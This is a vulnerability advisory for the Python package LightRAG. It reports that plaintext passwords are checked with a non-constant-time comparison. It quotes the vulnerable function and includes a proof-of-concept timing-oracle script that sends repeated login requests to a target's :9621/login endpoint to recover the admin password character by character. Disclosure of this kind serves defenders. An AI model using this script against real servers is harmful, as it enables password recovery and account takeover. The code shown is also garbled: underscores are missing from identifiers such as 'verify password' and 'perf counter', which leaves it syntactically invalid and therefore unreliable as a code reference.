PT-2026-105817 · Pypi · Hkuds Lightrag

Publicado

2026-10-01

·

Atualizado

2026-10-01

CVSS v3.1

5.9

Média

VetorAV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

When plaintext passwords are stored in AUTH ACCOUNTS, the comparison uses Python's == operator which is not constant-time. An attacker with low-latency access can exploit timing differences to recover the password character by character.

Details

python
# lightrag/api/passwords.py:13-26
def verify password(plain password: str, stored password: str) -> bool:
  if stored password.startswith("{bcrypt}"):
    ...
    return bcrypt.checkpw(...)  # constant-time OK

  return stored password == plain password # NOT constant-time VULN
  #  Python == short-circuits on first mismatched byte
  #  Timing leaks: password length + individual characters

PoC

python
# Timing oracle: recover password char-by-char
import httpx, time, string

TARGET = "http://<TARGET>:9621/login"
USER  = "admin"

def measure(pwd: str) -> float:
  t = time.perf counter()
  httpx.post(TARGET, data={"username": USER, "password": pwd})
  return time.perf counter() - t

known = ""
for  in range(32):
  best = max(string.printable,
        key=lambda c: sum(measure(known+c+"A"*20) for  in range(10)))
  known += best
  print(f"Recovered: {known}")

Impact

Observable timing discrepancy. Attackers with low-latency access can recover plaintext passwords character by character without triggering brute-force limits. Only affects deployments using unhashed passwords in AUTH ACCOUNTS.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-4061

Produtos afetados

Hkuds Lightrag